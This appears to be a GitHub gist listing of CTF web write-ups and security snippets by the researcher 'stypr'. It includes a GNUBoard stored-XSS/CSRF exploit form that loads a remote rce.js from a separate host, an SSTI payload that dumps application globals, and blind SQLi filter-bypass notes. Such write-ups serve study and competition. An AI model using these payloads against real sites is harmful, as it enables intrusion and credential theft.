🆎**********************************
Be Lazy~

Harold Kim stypr

@stypr
stypr / README.md
Last active April 19, 2021 08:15
BingoCTF 2020: Web - Temporary [Easy]

web: temporary writeup

There are two instances, namely public and internal. We can get the address of the public one by leaking $_SERVER['REMOTE_ADDR'] in phpinfo.php?phpinfo

$_SERVER['SERVER_NAME']	_
$_SERVER['SERVER_PORT']	80
$_SERVER['SERVER_ADDR']	172.21.0.2
@stypr
stypr / README.md
Last active April 19, 2021 08:15
BingoCTF 2020: Web - simpleboard [Medium]

web: simpleboard writeup

Let's check the main page's source code by view-source (view-source:http://web1.bingo.hypwnlab.com:12044/)

As we see in the following, the server loads an image from a website.

        <h3 class="text-center text-white pt-5"><img src="/?image=6c6f676f.png"></h3>

Let's take a look at the function in init.php that loads the image.

@stypr
stypr / exploit.html
Last active February 6, 2021 15:11
GNUBoard RCE ~2019.1
<!--
Stored XSS (2019.01.02)
-->
<form action="http://10.10.10.60/gnuboard5/adm/sms_admin/form_group_update.php" method="POST">
<input type='hidden' name='fg_no' value=''>
<input type='hidden' name='fg_name' id='payload' value=''>
</form>
<script>
var random = Math.round(Math.random() * 1000000000);
var script_url = '//10.10.10.30/vulnerable_rce_good_for_reason/rce.js'; // RCE from admin
@stypr
stypr / papago-api.php
Last active December 30, 2020 17:29
Deobfuscated Papago API (Python/Javascript/PHP) : Blocked as of December 2020
<?php
// Ported from papago.py
// v1: b64_enc(rot13([:16]) + [16:])
/* Derived from stackoverflow */
// Builds a random UUID-style string (8-4-4-4-12 hex groups) from mt_rand() output.
function uuidgen() {
    return sprintf('%08x-%04x-%04x-%04x-%04x%08x',
        mt_rand(0, 0xffffffff),
        mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xffff),
        mt_rand(0, 0xffff), mt_rand(0, 0xffffffff)
    );
}
@stypr
stypr / README.md
Last active August 25, 2020 15:06
Blind SQLi 2018: Utilizing SQL standard to create payloads

There are several ways to bypass blind SQLi filters, and today I will introduce a MySQL blind SQLi payload using the insert() function.

Interestingly, the payload itself is limited to MySQL, but the technique behind this attack should still be valid in most SQL dialects.

This attack is useful when the typical substring filters (e.g. left(), right(), mid(), substr(), regexp(), strcmp(), concat() ... LIKE ...) are blocked by the script.

TL;DR

@stypr
stypr / dogooos.md
Last active June 15, 2020 11:35
DEFCON Quals Web exploit (Participated as r3kapig)

SSTI

  1. Write one comment
  2. When writing the comment content, use SSTI to leak the author's credentials
{rating[comments][0].__class__.__init__.__globals__}
{'__name__': 'app.loaddata', '__doc__': None, '__package__': 'app', '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7fa912f51670>, '__spec__': ModuleSpec(name='app.loaddata', loader=<_frozen_importlib_external.SourceFileLoader object at 0x7fa912f51670>, origin='./app/loaddata.py'), '__file__': './app/loaddata.py', '__cached__': './app/__pycache__/loaddata.cpython-38.pyc', '__builtins__': {'__name__': 'builtins', '__doc__': "Built-in functions, exceptions, and other objects.\n\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.", '__package__': '', '__loader__': , '__spec__': ModuleSpec(name='builtins', loader=), '__build_class__': , '__import__': , 'abs': , 'all': , 'any': , 'ascii': , 'bin': , 'breakpoint': , 'callable': , 'chr': , 'compile': , 'delattr': , 'dir': , 'divmod': , 'eval': , 'exec': , 'format': 
@stypr
stypr / unzip_different_encoding.py
Created March 17, 2020 04:53
Unzip with different encoding
#!/usr/bin/python
#Nothing on stackoverflow works!
import zipfile
import sys

zf = zipfile.ZipFile('FILENAME', 'r')
for _file in zf.infolist():
    # Python 3's zipfile decodes non-UTF-8 entry names as cp437; undo that
    # and re-decode the raw bytes as cp949 (Korean) before extracting.
    _file.filename = _file.filename.encode('cp437').decode('cp949')
    zf.extract(_file)
zf.close()
@stypr
stypr / README.md
Last active February 9, 2020 07:01
CodeGate 2019 CSP challenge writeup

Solution

  1. if(md5($salt.$api_string) !== $sig){ can be bypassed with a hash length extension attack (didn't do it, but the key length is 12.)

  2. Use a custom header and body to trigger the CSP bypass.

@stypr
stypr / README.md
Last active January 26, 2020 20:37
SecuInside 2017: Mathboy7 (415pt)

Mathboy7 (415pt)

A random string can be generated through the ENCRYPT() function.

encryption-functions from mysql.com

  1. With ENCRYPT(x) the challenge cannot be solved probabilistically, but if a salt value is set, the first few characters come out the same, so the number of possibilities is greatly reduced.

  2. The output of ENCRYPT(x,y) consists of A-Za-z0-9./, which makes it hard probabilistically, but in the challenge strtolower($var) reduces the number of possibilities a second time.

@stypr
stypr / README.md
Last active September 18, 2019 09:56
2019 Cyber Operations Challenge Finals Pistol Exploit

Quick Summary

First-blooded this challenge. The server is down, so I cannot explain briefly.

  1. A comment in the website shows get_perm.php

  2. Another comment in get_perm.php shows ?remote_debug=1.

  3. Using a PHP trick, you get the privilege to write posts.